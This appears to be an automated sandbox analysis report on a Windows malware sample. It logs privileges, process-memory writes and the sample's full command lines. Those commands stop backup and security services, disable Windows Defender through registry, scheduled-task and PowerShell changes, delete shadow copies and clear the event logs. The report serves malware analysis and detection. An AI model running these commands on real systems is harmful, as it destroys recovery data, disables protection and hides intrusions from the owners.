Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1620 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 656 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 656 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 656 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 656 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1640 wrote to memory of 1020 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1640 wrote to memory of 1020 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1640 wrote to memory of 1020 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1640 wrote to memory of 1020 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1148 wrote to memory of 1804 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1148 wrote to memory of 1804 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1148 wrote to memory of 1804 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1148 wrote to memory of 1804 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1952 wrote to memory of 308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1952 wrote to memory of 308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1952 wrote to memory of 308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1952 wrote to memory of 308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 824 wrote to memory of 1056 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 824 wrote to memory of 1056 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 824 wrote to memory of 1056 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 824 wrote to memory of 1056 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 660 wrote to memory of 1172 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 660 wrote to memory of 1172 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 660 wrote to memory of 1172 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 660 wrote to memory of 1172 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1112 wrote to memory of 1664 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1112 wrote to memory of 1664 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1112 wrote to memory of 1664 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1112 wrote to memory of 1664 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 992 wrote to memory of 988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 992 wrote to memory of 988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 992 wrote to memory of 988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 992 wrote to memory of 988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe

"C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

memory/656-54-0x0000000000000000-mapping.dmp

memory/704-55-0x0000000000000000-mapping.dmp

memory/1640-56-0x0000000000000000-mapping.dmp

memory/1020-57-0x0000000000000000-mapping.dmp

memory/1148-58-0x0000000000000000-mapping.dmp

memory/1804-59-0x0000000000000000-mapping.dmp

memory/1952-60-0x0000000000000000-mapping.dmp

memory/308-61-0x0000000000000000-mapping.dmp

memory/824-62-0x0000000000000000-mapping.dmp

memory/1056-63-0x0000000000000000-mapping.dmp

memory/660-64-0x0000000000000000-mapping.dmp

memory/1172-65-0x0000000000000000-mapping.dmp

memory/1112-66-0x0000000000000000-mapping.dmp

memory/1664-67-0x0000000000000000-mapping.dmp

memory/992-68-0x0000000000000000-mapping.dmp

memory/988-69-0x0000000000000000-mapping.dmp

memory/1812-70-0x0000000000000000-mapping.dmp

memory/1712-71-0x0000000000000000-mapping.dmp

memory/1656-72-0x0000000000000000-mapping.dmp

memory/1624-73-0x0000000000000000-mapping.dmp

memory/1896-74-0x0000000000000000-mapping.dmp

memory/780-75-0x0000000000000000-mapping.dmp

memory/1632-76-0x0000000000000000-mapping.dmp

memory/2000-77-0x0000000000000000-mapping.dmp

memory/1604-78-0x0000000000000000-mapping.dmp

memory/328-79-0x0000000000000000-mapping.dmp

memory/704-80-0x0000000000000000-mapping.dmp

memory/1984-81-0x0000000000000000-mapping.dmp

memory/1064-82-0x0000000000000000-mapping.dmp

memory/972-83-0x0000000000000000-mapping.dmp

memory/1440-84-0x0000000000000000-mapping.dmp

memory/1100-85-0x0000000000000000-mapping.dmp

memory/1192-86-0x0000000000000000-mapping.dmp

memory/1664-87-0x0000000000000000-mapping.dmp

memory/1028-88-0x0000000000000000-mapping.dmp

memory/1704-89-0x0000000000000000-mapping.dmp

memory/1736-90-0x0000000000000000-mapping.dmp

memory/1748-91-0x0000000000000000-mapping.dmp

memory/1908-92-0x0000000000000000-mapping.dmp

memory/896-93-0x0000000000000000-mapping.dmp

memory/1864-94-0x0000000000000000-mapping.dmp

memory/1868-95-0x0000000000000000-mapping.dmp

memory/1212-96-0x0000000000000000-mapping.dmp

memory/1216-97-0x0000000000000000-mapping.dmp

memory/1180-98-0x0000000000000000-mapping.dmp

memory/1272-99-0x0000000000000000-mapping.dmp

memory/1520-100-0x0000000000000000-mapping.dmp

memory/1208-101-0x0000000000000000-mapping.dmp

memory/280-102-0x0000000000000000-mapping.dmp

memory/460-103-0x0000000000000000-mapping.dmp

memory/1964-104-0x0000000000000000-mapping.dmp

memory/900-105-0x0000000000000000-mapping.dmp

memory/2028-106-0x0000000000000000-mapping.dmp

memory/1988-107-0x0000000000000000-mapping.dmp

memory/912-108-0x0000000000000000-mapping.dmp

memory/1056-109-0x0000000000000000-mapping.dmp

memory/1108-110-0x0000000000000000-mapping.dmp

memory/1892-111-0x0000000000000000-mapping.dmp

memory/1904-112-0x0000000000000000-mapping.dmp

memory/756-113-0x0000000000000000-mapping.dmp

memory/1940-114-0x0000000000000000-mapping.dmp

memory/1516-115-0x0000000000000000-mapping.dmp

memory/600-116-0x0000000000000000-mapping.dmp

memory/1168-117-0x0000000000000000-mapping.dmp

memory/1340-118-0x0000000075AE1000-0x0000000075AE3000-memory.dmp

memory/1340-119-0x00000000023E0000-0x000000000302A000-memory.dmp

memory/1340-120-0x00000000023E0000-0x000000000302A000-memory.dmp

memory/1340-121-0x00000000023E0000-0x000000000302A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 136df8aa392c6a628beedcf3fa5b77ef
SHA1 b1358967b392b0066c22811f77833433e71da1ac
SHA256 2704d62928993cbc601f280dd74c224b8f89b96e52b5e6f57d97eaa642c3a16f
SHA512 44d017d9f003032f1f860fe055e628601a3e788ca8cfbf5b4176af5fe1f03387062f07c32d4cf5c935451f41ebb8c40fb21c0ea5f0aa3a0230db624d026ed8b9